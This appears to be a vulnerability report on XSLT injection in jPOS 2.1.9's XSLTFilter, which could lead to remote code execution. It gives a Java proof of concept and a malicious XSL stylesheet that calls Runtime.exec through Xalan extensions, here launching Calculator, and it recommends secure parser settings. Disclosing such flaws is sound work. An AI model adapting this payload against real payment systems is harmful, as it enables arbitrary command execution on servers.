The risk of XSLT injection in jPOS can lead to Remote Code Execution (RCE).

[c1gar]

In the org.jpos.iso.filter.XSLTFilter.java file, there is a functionality for XSL transformation without setting secure parameters, which poses a risk of Remote Code Execution (RCE). It is recommended to add secure parameters.
maven

<!-- https://mvnrepository.com/artifact/org.jpos/jpos -->
    <dependency>
      <groupId>org.jpos</groupId>
      <artifactId>jpos</artifactId>
      <version>2.1.9</version>
    </dependency>

POC.java

import org.jpos.iso.ISOChannel;
import org.jpos.iso.ISOException;
import org.jpos.iso.ISOMsg;
import org.jpos.iso.filter.XSLTFilter;
import org.jpos.util.LogEvent;
public class jposTest {
    public static void main(String[] args) throws ISOException {
        ISOChannel channel = new CustomISOChannel();
        ISOMsg m = new ISOMsg();
        LogEvent evt = new LogEvent();
        XSLTFilter xsltFilter = new XSLTFilter("poc.xsl",true);
        xsltFilter.filter(channel,m,evt);
    }
}

poc.xsl

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
    <xsl:template match="/">
        <xsl:variable name="rtobject" select="rt:getRuntime()"/>
        <xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/>
        <xsl:variable name="processString" select="ob:toString($process)"/>
        <xsl:value-of select="$processString"/>
    </xsl:template>
</xsl:stylesheet>